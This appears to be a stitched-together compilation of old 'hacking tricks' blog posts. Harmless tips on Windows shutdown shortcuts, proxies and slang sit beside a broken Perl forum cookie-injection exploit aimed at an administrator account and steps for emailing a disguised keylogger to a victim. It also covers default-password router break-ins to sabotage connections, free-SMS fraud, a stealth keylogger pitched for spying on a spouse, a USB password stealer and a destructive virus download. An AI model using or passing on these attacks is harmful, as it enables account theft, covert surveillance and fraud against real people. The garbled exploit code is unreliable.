Create One-Click Shutdown and Reboot Shortcuts



This is a really easy one, but a very effective one. Enjoy it! First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c "Rebooting your PC"

Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c "Bye Bye m8!"

shutdown -r -t 03 -c "I ll be back m8 ;)!"

Switch : What it does

-s : Shuts down the PC.

-l : Logs off the current user.

-t nn : Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext" : Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f : Forces any running applications to shut down.

-r : Reboots the PC.

Anonymity of a Proxy Server Explained

How Does a Proxy Server Work?
This is the first question that arises in our minds when we use proxy servers for surfing the Internet without revealing our identity to others. Here all these mind-boggling questions are answered with easy-to-understand examples.
The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.
What your browser transmits to a web-server:
  • name and a version of an operating system

  • name and a version of a browser

  • configuration of a browser (display resolution, color depth, java / javascript support, …)

  • IP-address of a client

  • Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
  • country where you are from

  • city

  • your provider’s name and e-mail

  • your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).
These are some environment variables:
REMOTE_ADDR - IP address of a client
HTTP_VIA - if it is not empty, then a proxy is used. The value is an address (or several addresses) of a proxy server; this variable is added by a proxy server itself if you use one.
HTTP_X_FORWARDED_FOR - if it is not empty, then a proxy is used. The value is the real IP address of a client (your IP); this variable is also added by a proxy server if you use one.
HTTP_ACCEPT_LANGUAGE - what language is used in the browser (what language a page should be displayed in)
HTTP_USER_AGENT - the so-called “user agent”. For all browsers this is Mozilla. Furthermore, the browser’s name and version (e.g. MSIE 5.5) and the operating system (e.g. Windows 98) are also mentioned here.
HTTP_HOST - the web server’s name
This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.

These are examples of variable values:
REMOTE_ADDR = 194.85.1.1

HTTP_ACCEPT_LANGUAGE = ru

HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP_HOST = www.webserver.ru

HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)

HTTP_X_FORWARDED_FOR = 194.115.5.5
Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.
If a proxy server is not used, then environment variables look in the following way:
REMOTE_ADDR = your IP

HTTP_VIA = not determined

HTTP_X_FORWARDED_FOR = not determined
According to which environment variables are hidden by proxy servers, there are several types of proxies:

Transparent Proxies
They do not hide information about your IP address:
REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = your IP
The function of such proxy servers is not the improvement of your anonymity on the Internet. Their purpose is information caching, organization of joint access to the Internet for several computers, etc.

Anonymous Proxies
All proxy servers that hide a client’s IP address in any way are called anonymous proxies.
Simple Anonymous Proxies
These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:

REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = proxy IP
These proxies are the most widespread among other anonymous proxy servers.
Distorting Proxies
Like simple anonymous proxy servers, these proxies do not hide the fact that a proxy server is used. However, a client’s IP address (your IP address) is replaced with another (arbitrary, random) IP:
REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = random IP address

High Anonymity Proxies
These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:
REMOTE_ADDR = proxy IP

HTTP_VIA = not determined

HTTP_X_FORWARDED_FOR = not determined
That means that the values of the variables are the same as if a proxy is not used, with the exception of one very important thing: the proxy IP is used instead of your IP address.

Summary
Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!
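Seen from the web server's side, the taxonomy above collapses into fewer cases, because HTTP_VIA and HTTP_X_FORWARDED_FOR are request headers whose content the sender chooses, while REMOTE_ADDR is the only address the server observed itself. The following is an added example, not code from the original article; the function names, verdict labels and all sample requests other than the article's own values are constructed for illustration.

```python
import ipaddress


def parse_ips(header_value):
    """Return the syntactically valid IPs in a comma-separated header value."""
    found = []
    for token in (header_value or "").split(","):
        try:
            found.append(ipaddress.ip_address(token.strip()))
        except ValueError:
            continue  # "unknown", hostnames, empty tokens, arbitrary junk
    return found


def classify_request(environ):
    """Classify a request using the three variables the article discusses.

    REMOTE_ADDR is taken from the TCP connection. HTTP_VIA and
    HTTP_X_FORWARDED_FOR are copied from request headers, so they are
    recorded as claims and never used as the trusted client address.
    """
    remote = ipaddress.ip_address(environ["REMOTE_ADDR"])
    via = (environ.get("HTTP_VIA") or "").strip()
    xff_raw = (environ.get("HTTP_X_FORWARDED_FOR") or "").strip()
    result = {"peer": str(remote), "claimed_client": None,
              "claimed_is_public": None}

    if not via and not xff_raw:
        # A direct client and a high anonymity proxy look identical here.
        result["verdict"] = "direct-or-high-anonymity"
        return result

    claimed = parse_ips(xff_raw)
    if not claimed:
        # A proxy announced itself but gave no usable client address.
        result["verdict"] = "proxy-declared-client-withheld"
        return result

    client = claimed[0]  # left-most entry: address attributed to the client
    result["claimed_client"] = str(client)
    result["claimed_is_public"] = client.is_global
    if client == remote:
        result["verdict"] = "simple-anonymous"
    else:
        # The server cannot tell a real client IP from a made-up one.
        result["verdict"] = "transparent-or-distorting"
    return result


# Sample requests. "article example" uses the values printed in the article;
# the others are constructed.
SAMPLES = {
    "no proxy headers": {"REMOTE_ADDR": "203.0.113.7"},
    "article example": {
        "REMOTE_ADDR": "194.85.1.1",
        "HTTP_VIA": "194.85.1.1 (Squid/2.4.STABLE7)",
        "HTTP_X_FORWARDED_FOR": "194.115.5.5",
    },
    "simple anonymous": {
        "REMOTE_ADDR": "198.51.100.9",
        "HTTP_VIA": "198.51.100.9",
        "HTTP_X_FORWARDED_FOR": "198.51.100.9",
    },
    "private address in header": {
        "REMOTE_ADDR": "198.51.100.9",
        "HTTP_VIA": "1.1 cache",
        "HTTP_X_FORWARDED_FOR": "192.168.1.23",
    },
    "client withheld": {
        "REMOTE_ADDR": "198.51.100.9",
        "HTTP_VIA": "1.1 cache",
        "HTTP_X_FORWARDED_FOR": "unknown",
    },
}

if __name__ == "__main__":
    for name, env in SAMPLES.items():
        print(f"{name:28} {classify_request(env)}")
```

For logging and access control, the `peer` field is the value to rely on; `claimed_client` is useful as context only.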

How to Hack into forums

This is what you like to call “Hacking a forum”.

I call it “Cracking into a forum” … Learn what hacking means you, lol…

PS: I am hacking a forum slowly, everything I am doing now is posted here in steps:

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be referring to it as “hackingsite”.

So you’ve got your target. You know the forum you want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1”. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2”.

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2”.

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:

CODE

#!/usr/bin/perl -w

##################################################################

# This one actually works :) Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com

##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;

$ua->agent(”Mosiac 1.0″ . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = ”;}

if (!$ARGV[3]) {$ARGV[3] = ”;}

my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;

my $user = $ARGV[1]; # userid to jack

my $iver = $ARGV[2]; # version 1 or 2

my $cpre = $ARGV[3]; # cookie prefix

my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])

{

print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;

exit;

}

my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);

my $outputs = ”;

for( $i=1; $i < j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”> $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);

my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this

# does not appear anywhere in the sources

$pattern = ”;

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )

{

$outputs .= $current;

print “$current\n”;

last;

}

}

if ( length($outputs) < member_id=” . $user . ” pass_hash=”">

What the fuck, pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.

Installing a Keylogger on a Remote Machine

Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.

Now to install a Keylogger on a Remote Computer you have to follow the steps given below:

  1. First of all download Winspy keylogger software from link given below:

    http://www.win-spy.com/

  2. After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.

  3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.

  4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.

  5. Now, Winspy’s main screen will be displayed as shown in image below:

  6. Select Remote at top, then Remote install.

  7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.

    User - type in the victim’s name

    File name - Name the file to be sent. Use the name such that victim will love to accept it.

    File icon - Keep it the same

    Picture - select the picture you want to apply to the keylogger.

    Email keylog to - Enter your Email address. Hotmail and Yahoo do not accept Keylog Files so enter other email address.

    That’s it. This much is enough. If you want, you can change other settings also.

  8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.

So guys, I hope you have got the trick on how to hack any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.

Airtel Hack 2009 for Unlimited Free SMS

Many people search for free Airtel message center number to start sending unlimited messages without paying for them. Well, previously many websites made posts on these free message center numbers, but after the frequent use of the number, Airtel capped or filtered those numbers from further use. But still there are few working message center numbers and here I am going to reveal that with you. Note that Airtel might ban this number anytime, so be fast in using this and send free sms to anyone from your Airtel mobile number.

How to send unlimited free SMS using free SMS center no hack
  1. Navigate to Messages option on your mobile and click on Settings

  2. Click on Message Center Number and proceed to add a new message center number.

  3. In Message Center Name field, write anything. For an example, “crack to hack”.

  4. In the Message Center Number field, write +919810051905

  5. Choose Preferred Connection Type as Packet Data

  6. Save the message center and activate it from the options.



Now we have configured the message settings to send and receive all messages through another message center number. But since we have selected Packet data as connection type, we have to do some additional settings on our phone.
  1. Go to your phone menu and navigate to Settings >> Phone Settings >> Connection >> Packet Data

  2. In the settings of packet Data, edit the following options

  3. Packet Data Connection >> When available and Access Point >> Airtel Live

  4. Save all settings and you are done.

Note: Here we are using a CDMA message center number to send free messages from Airtel mobile. Since CDMA networks don’t support 91 as the country code, you have to add 0 before every number. This is very important and if you make mistake here, this trick will not work.
Example : Suppose you want to send free messages to 9861098610, now while composing the SMS, type this number as 09861098610 instead of 919861098610 or +919861098610.
And also, message center number settings option may vary from phone to phone. The above steps are mentioned for Nokia mobile phones. If you want to try sending free SMS from any other handset, use your mobile manual and set the new message center number accordingly.

Windows 7 Cheat Sheet

From Desktop

  1. Windows Key + Tab : Aero [press Tab to cycle between Windows]

  2. Windows Key + E : Windows Explorer is launched.

  3. Windows Key + R : Run Command is launched.

  4. Windows Key + F : Search (which is there in previous Windows versions too)

  5. Windows Key + X : Mobility Center

  6. Windows Key + L : Lock Computer (It is there from the earlier versions as well)

  7. Windows Key + U : Launches Ease of Access

  8. Windows Key + P : Projector

  9. Windows Key + T : Cycle Super Taskbar Items

  10. Windows Key + S : OneNote Screen Clipping Tool [requires OneNote]

  11. Windows Key + M : Minimize All Windows

  12. Windows Key + D : Show/Hide Desktop

  13. Windows Key + Up : Maximize Current Window

  14. Windows Key + Down : Restore Down / Minimize Current Windows

  15. Windows Key + Left : Tile Current Window to the Left

  16. Windows Key + Right : Tile Current Windows to the Right

    [Continue pressing the Left and Right keys to rotate the window as well]

  17. Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc.

  18. Windows Key + = : Launches the Magnifier

  19. Windows Key + Plus : Zoom in


  20. Windows Key + Minus : Zooms out

  21. Windows Key + Space : Peek at the desktop

From Windows Explorer

22. Alt + Up : Go up one level

23. Alt + Left/ Right : Back/ Forward

24. Alt + P : Show/hide Preview Pane

Taskbar modifiers

25. Shift + Click on icon : Open a new instance

26. Middle click on icon : Open a new instance

27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges

28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu.

29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc.

30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group

Though some of them exist in previous versions of Windows, Windows 7 has incorporated many of them and introduced many new ones.

Disguise as GoogleBot to view Hidden Content of a Website

Ever experienced this? You ask Google to search something and it will return a lot of relevant results, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first. This means that Google is able to see what a normal netizen cannot see.
The reason behind this is that Google uses a bot called GoogleBot, and most websites which force users to register or even pay in order to search and use their content leave a backdoor open for the GoogleBot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure. Examples of such sites are Expert-Exchange, Windows Magazine, .Net Magazine, Nature, and many other sites around the globe.
If you could disguise yourself as GoogleBot, then you could also see what GoogleBot can.
How to Disguise as GoogleBot?

It is quite simple. You just need to change your browser’s User Agent. To change your browser’s User Agent follow the steps given below:

  • Copy the following code segment into a notepad file and save it as Useragent.reg or you may also download it.

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]

    @="Googlebot/2.1"

    "Compatible"="+http://www.googlebot.com/bot.html"

  • Now Double-Click on the file Useragent.reg to merge the registry file into your Windows Registry.

  • Now Restart your computer. This is required to apply the changes made into the Registry.

  • Voila! You’re done! Now you have become GoogleBot.

How to Revert Back to the Normal Agent?

  • For IE users : To restore the IE User Agent, Follow the Given Steps Below:
    • Copy the following code segment into a notepad file and save it as Normalagent.reg or you may also download it:

      Windows Registry Editor Version 5.00

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]

      @="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    • Now Double-Click on the file Normalagent.reg to merge the registry file into your Windows Registry.

    • Now Restart your computer. This is required to apply the changes made into the Registry.


  • For Opera Users : Opera allows on-the-fly switching of User Agents through its “Browser Identification” function.

  • For Firefox users : Just download User Agent Switcher extension for Firefox.
    • Now Goto Tools -> User Agent Switcher -> Options -> Options.

    • Click “User Agents”

    • Click “Add” and fill in the following information in the form:
      • Description: Googlebot

      • User Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

      • App Name: Googlebot

      • App Version: 5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

      • Platform: +http://www.google.com/bot.html

      • Vendor:

      • Vendor Sub:


    • Click “OK”.

    • Now you may change the user agent on the fly.
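The disguise described above only works against sites that trust the User-Agent string on its own. The following is an added example, not part of the original post, of the server-side check that defeats it: a reverse DNS lookup on the connecting address, a match against the crawler hostname suffixes Google documents, and a forward lookup that must return the same address. The function names and the sample DNS tables are constructed for illustration.

```python
import ipaddress
import socket

# Reverse DNS suffixes Google documents for verifying its crawlers.
CRAWLER_SUFFIXES = (".googlebot.com", ".google.com")


def system_reverse(ip):
    """PTR lookup through the system resolver; None when there is no record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def system_forward(host):
    """Address lookup through the system resolver; empty set on failure."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except OSError:
        return set()


def same_ip(a, b):
    try:
        return ipaddress.ip_address(a) == ipaddress.ip_address(b)
    except ValueError:
        return False


def is_verified_googlebot(remote_addr, reverse=system_reverse,
                          forward=system_forward):
    """Forward-confirmed reverse DNS check on the connecting address."""
    host = reverse(remote_addr)
    if not host:
        return False
    host = host.rstrip(".").lower()
    if not host.endswith(CRAWLER_SUFFIXES):
        return False
    # Whoever controls an address block controls its PTR records, so the
    # name only counts if it resolves back to the same address.
    return any(same_ip(remote_addr, a) for a in forward(host))


def classify_client(user_agent, remote_addr, reverse=system_reverse,
                    forward=system_forward):
    """Return 'regular-client', 'verified-googlebot' or 'spoofed-googlebot'."""
    if "googlebot" not in (user_agent or "").lower():
        return "regular-client"
    if is_verified_googlebot(remote_addr, reverse, forward):
        return "verified-googlebot"
    return "spoofed-googlebot"


# Constructed DNS data (documentation address ranges), so the example runs
# offline. 198.51.100.77 carries a PTR naming googlebot.com, but that name
# resolves to a different address.
SAMPLE_PTR = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com",
    "203.0.113.50": "host50.example.net",
    "198.51.100.77": "crawl-192-0-2-10.googlebot.com",
}
SAMPLE_A = {"crawl-192-0-2-10.googlebot.com": {"192.0.2.10"}}


def sample_reverse(ip):
    return SAMPLE_PTR.get(ip)


def sample_forward(host):
    return SAMPLE_A.get(host, set())


GOOGLEBOT_UA = ("Mozilla/5.0 (compatible; Googlebot/2.1; "
                "+http://www.google.com/bot.html)")
IE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

if __name__ == "__main__":
    for ua, ip in [(GOOGLEBOT_UA, "192.0.2.10"),
                   ("Googlebot/2.1", "203.0.113.50"),
                   (GOOGLEBOT_UA, "198.51.100.77"),
                   (IE_UA, "203.0.113.50")]:
        print(ip, classify_client(ua, ip, sample_reverse, sample_forward))
```

A site that serves crawler-only content after this check, rather than after a User-Agent match, does not expose it to a browser with a changed User Agent.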

Accessing the Router

Tricks and tweaks based on your own experience teach you many things, like the one I’m going to mention now.

Well the last Post by Manav, forces me to publish this article.

How to Access a router and what can you do after it ?

I’ve been doing this for the past few months, and when Manav said that it is a global problem, I felt I should appreciate him for that.

Okei, so here we go,

There are actually two methods

  1. Manual (I love this)

  2. Remote (I still love this)

But before just illustrating the trick, I’d like to introduce some thing to you all. A router is a device that connects with the Lan Card/Ethernet or with the USB port of your computer, it is a gateway of your computer to the outside world.

It is assumed that with the introduction of router, direct access to your computer, which was possible in the Dial UP reign, is now abolished, but in this world nothing is safe, so we’ll see.

Manual Method

The Router and the computer make a small local Area Network.

There are different IP addresses for different devices/nodes in the LAN, normally the range starts from 192.168.1.1, you can check out your node’s IP, by viewing the properties of the Network Connection (if its connected).

Now, normally the router or the server (if in a larger network) has the local IP 192.168.1.1. You can always access the configuration page by visiting the local IP 192.168.1.1; type this IP address into any web browser.

This will lead you to the configuration page, where it will ask you for the user name and password, see the snapshot

Accessing the configuration PHP page

Now, here lies the biggest flaw of the global aspect: try this username: admin, password: admin. Try this, it will work in 95% of cases. Why? Because even the IT gurus are n00bs enough to never look into this problem. It’s a global situation, from Japan to Pakistan.

So here you are in the Configuration page , now even if the password is not admin, and you’ve physical access to the router, just reset it, all it need is a pin ;)

In the Remote Method, all you need to know is the IP of the router, no local IP won’t get you to anybody’s router, so you need to know the IP when he is connected, there are so many methods, I’ll have a separate post for that.

Now the Question lies, what Can I do for fun ?

The most obvious thing that you can do is “trouble him/her”, how ?, well just navigate through the configuration pages, to find something like “Internet Connection “, It list the connections, see the snapshot

Internet Connection Page

Now this is your work, out of the given list only one will be active, which one?, most probably the top one, edit it, change the VPI and VCI value, hola, you’re done, this trick will atleast trouble him for 2-3 days. And beside you can change many other things, that I leave on you ! :D

Changing VPI and VCI

In certain Router, it is even possible to get the username of the Internet Connection and the password of the connection in hidden form, but everybody knows that the password is there, and since you’ve access to the PHP page you can get the damn password out,for example see this snap

accessing the password

What else can I do ?, well I’ven’t tried it but lets see, the router and the computer interacts by using a port, which port ? , we don’t know, it can be any of those 65000 ports, so running a port scanner ( you’ll find many ) is an advisable thing, go ahead and let me know !

Perfect Keylogger undetectable. with key Gen

BlazingTools Perfect Keylogger with key Gen Perfect Keylogger is a remote covert surveillance tool made for everybody! With this key logger you can receive their keystrokes, IM chats, websites, screenshots and passwords by email. Covert remote surveillance - as easy as never before! Some applications of the keylogger: parental control; stealth monitoring of your spouse, internet friends etc. It is virtually undetectable

Download

Restore Task Manager, Regedit and Folder Options Disabled by Virus

Let’s face it. All of us have been infected by virus before. Even if you have anti-virus installed, you can still be infected by a new or custom virus that is not recognized by your anti-virus. Sometimes after removing the virus completely from our system, you’ll face new problems such as you can no longer bring up Windows Task Manager from CTRL+ALT+DEL. You get the error message saying “Task Manager has been disabled by your administrator”….



You think that it’s easy to fix this problem by going to Registry Editor but you can’t! You get the error message “Registry editing has been disabled by your administrator”.



Folder Options and even Show Hidden Files & Folder is disabled! How frustrating! Don’t worry, here’s how to restore your Windows Task Manager, Registry Editor, Folder Options and Show hidden files & folders.

This problem is most commonly caused by a virus called “Brontok”. Brontok virus will make some changes to the system restrictions in order to hide itself from easy detection and also from easy cleaning.

Here’s a free tool called Remove Restrictions Tool (RRT) which is able to re-enable everything that the virus had previously disabled, and gives you back control over your own computer.



Remove Restrictions Tool is able to re-enable:

- Registry Tools (regedit)

- Ctrl+Alt+Del

- Folder Options

- Show Hidden Files

Small and easy to use. Make sure you boot into Safe Mode to use Remove Restrictions Tool (RRT). Just click on the buttons and it’ll do its job.



Click Here to download

USB Password Stealer

Tweaked USB that steals every passwords including licences.

Instructions

1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.

2.Insert the USB in your victim’s computer.

3.View folder “dump” to see the passwords.

Download

Password: www.dl4all.com

Database to the Virus

The Complete Database to the virus has been uploaded, open the link to download the zipped file

It’s a silent killer, kills your hard-disk, and it schedules itself using mount points, one of the rarest cases

http://ankit-cracker.zoomshare.com/files/VM/ekugb.bat.zip

How to see Rapidshare Folders of Users

rapidshare.com/users/xxxxx

where a collection of files can be seen. But the question is that how to find such links? Well google will help you in this :)

But how?

Use following keywords in google to see all rapidshare folders available on internet

site:rapidshare.com inurl:users “*”

site:rapidshare.de inurl:users “*”

site:rapidshare.com inurl:files “*”

site:rapidshare.de inurl:files “*”

site:rapidshare.com inurl:users (pass|password)

site:rapidshare.de inurl:users (pass|password)

Suppose u need some info on hacking. Then u can try following keywords to see all rapidshare folders having any hacking related thing in it

site:rapidshare.com inurl:users “hack”

site:rapidshare.com inurl:users “hacking”

And get your desired file/folder, whatever you need. No need of any rapidshare search engine. Google will do everything for you :)

Different Internet Slangs And Phrases -Internet Slangs Dictionary

0-9

1337 (written in ASCII) - From the word Leet, derived from the word elite

2 - too, or to

4 - For

A

AFAICR/S/T - As far as I can recall / remember / see / tell

AFAIK - As far as I know

AFK - Away from keyboard

ANFSCD - And Now For Something Completely Different. Used to change the subject of conversation.

ASAP - As soon as possible

ASL - Age / sex / location

ATEOTD - At The End of the Day

ATM - At the moment

AWOL - Absent Without (Official) Leave

AYBABTU (also abbreviated as AYB) - All your base are belong to us (from the video game Zero Wing)

B

B2B - Business to Business

B& and/or B7 - Banned

BBIAB - Be back in a bit

BBL/S - Be back later / shortly / soon

BCNU - Be seein’ you

Blog - Also known as web log or an online journal

BOFH - ~censored~ operator from hell

Bot - Any type of automated software in chatrooms and web-cataloging software

BRB - Be right back

BSOD - Blue Screen of Death

BTDT - Been there done that

BTW - By the way

Bump - Increment (For example, C’s ++ operator.) or a backronym for “Bring Up My Post”

C

Crawl - To retrieve a web page along with the hyperlinks that reference it

Crapplet - A poorly written computer application

CU - See you (later)

CYA - See ya OR Cover Your Ass

Cyber (prefix) - A term used to connect the subsequent word loosely to the world of computers or the Internet or sex over a computer

Cyberspace - Virtual reality, the Internet, the World Wide Web, and other kinds of computer systems. Science fiction author William Gibson popularized the term in his novel Neuromancer. Gibson used the word to describe a virtual world of computer networks that his cyberpunk heroes ‘jacked into’

D

DFTT - Don’t feed the trolls

DGAF - Don’t Give A ~censored~

DIAF - Die in a fire

DILLIGAF/D/S - Does it look like I give a flip / ~censored~ / damn / shit

DND - Do not disturb

DOA - Dead on arrival. Refers to hardware that is broken on delivery.

E

EOF - End Of File

EOM - End of Message

EOL - End of Life. Device or hardware that is at the end of its product life cycle.

EQ - EverQuest

ETA - Estimated time of arrival

F

FAQ - Frequently Asked Question(s)

FFS - For ~censored~’s sake

Flamer - Someone who makes inflammatory, abusive or directly offensive comments. Similar to, but not quite the same as an Internet troll

FMCDH - From My Cold Dead Hands

FOAD - ~censored~ off and die

FOAF - Friend of a friend

FTL - For the loss

FTW - For the win

FU - ~censored~ you

FUBAR - ~censored~ up beyond all recognition / repair (from military slang; pronounced “foo-bar”)

FUD - Fear, Uncertainty and Doubt (the purposeful spread of misinformation)

FWIW - For what it’s worth

FYI - For your information

G

GBTW - Get back to work

GF - Great/good fight/girlfriend

GFU - Good for you

GFY - Go ~censored~ yourself

GG - Good game, used at or near the conclusion of a gaming match

GJ - Good job, often used in online gaming when a teammate performs an act benefitting his team, such as killing an opponent or enabling that kill

GMTA - Great minds think alike

Godwin’s Law - Dictates that the longer a thread, the more likely someone will post a comparison involving Nazis or Hitler

Gratz - Congratulations

GTFO - Get the ~censored~ out

GTG or G2G - ‘Got to go’ or ‘Good to go’

GR - Good Race

GR8 - Great

H

HAND - Have A Nice Day

Handle - Name used in online chat, (AKA nick(name), alias, screen/user name)

HF - Have fun

Haxor or H4x0r (1337) - Hacker

Hit - A request made to the web server, (noun) the results of an internet search, (verb) loading a Web page. Hits are not equivalent to visitors of a webpage.

Home page - The website’s introduction page, starting point, and guide. The technical term is “index”

Hot list - A collection of publicly available URLs (World Wide Web site addresses), sometimes available as text files.

HTH - Hope this / that helps

H8 - Hate

I

IANAL - I am not a lawyer

IBTL - In before the lock

IDC - I don’t care

IDK - I don’t know

IIRC - If I recall / remember correctly

IIUC - If I understand correctly

IMO/IMHO/IMNSHO/IMAO - In my (humble / honest / not so humble / arrogant) opinion

Information superhighway - The Internet (AKA: I-way, infobahn)

IONO - I don’t know

IOW - In other words

IRC - Internet Relay Chat

IRL - In real life

ITYM - I Think You Mean

IWSN - I want sex now

IYKWIM - If you know what I mean

J

Jaggy - Aliased computer graphics

JK or j/k - Just kidding, or joke

JFGI - Just ~censored~/Freaking Google It

K

k or kk - OK

KISS - Keep it simple stupid.

KS(ing) - Kill-Steal(ing)

KOS - Kill on sight

KTHX - OK, thanks

KTHXBAI or KTHXBYE - OK, thanks, goodbye, used either to cut short a conversation or to express displeasure with being cut short

L

L2P - Learn to play; an admonishment to MMORPG players who are incompetent and/or whine

L8R - Later. L8R, also sometimes abbreviated as L8ER, is commonly used in chat rooms and other text-based communications as a way of saying goodbye.

Lag - Slang term for slow Internet speeds or high Internet latency; Lag is sometimes due to a server problem, but more frequently due to the connection between client and server. A slow or intermittent connection may often be referred to as laggy

Lamer - A know-nothing, one who is lame.

Leet - Often spelled as l33t or 1337 in ASCII form. It originally meant elite

LFG - Looking for group

LFM - Looking for more

LM(F)AO - Laughing my (frigging) ass off

LMIRL - Let’s meet in real life.

LMK - Let me know

LOL - Laughing out loud, laugh out loud

LTNS - Long time no see

Lurker - Someone who frequents a Usenet group without participating in discussions

M

MMORPG, MMO - Massive Multi-player Online Role Playing Game

MMOFPS - Massive Multi-player Online First Person Shooter

MOTD - Message of the day

MS - MapleStory, an MMORPG

MTFBWY - May The Force be with you

MUD - Multi-User Dungeon

MUSH - Multi-User Shared Hallucination

MYOB - Mind your own business

M8 - Mate

N

NE1 - “Anyone”

NFI - “No ~censored~ Idea”

Newbie, noob, or n00b - An inexperienced user of a system or game, or an annoying person.

NIFOC - Naked In Front Of Computer

NM - (Sometimes written N/M) Not much, Never mind or no message, used on message boards or in e-mails to indicate that everything is already said in the subject line.

NP - No problem

NSFW - Not safe for work. Warning about content that may get the viewer in trouble with his employer or co-workers.

NVM, NVMD, or nm - Nevermind, not much

O

O RLY - Oh really?

OIC - Oh, I see

OFN - Old ~censored~ news

OMG - Oh my god

OMFG - Oh my ~censored~ god

OMW - On my way or Oh my word

OP - Original poster / Operator / Outpost

OS - Operating system

OT - Off topic

OTOH - On the other hand

OTP - On the phone or One true pairing

P

P2P - Peer to peer, or pay to play

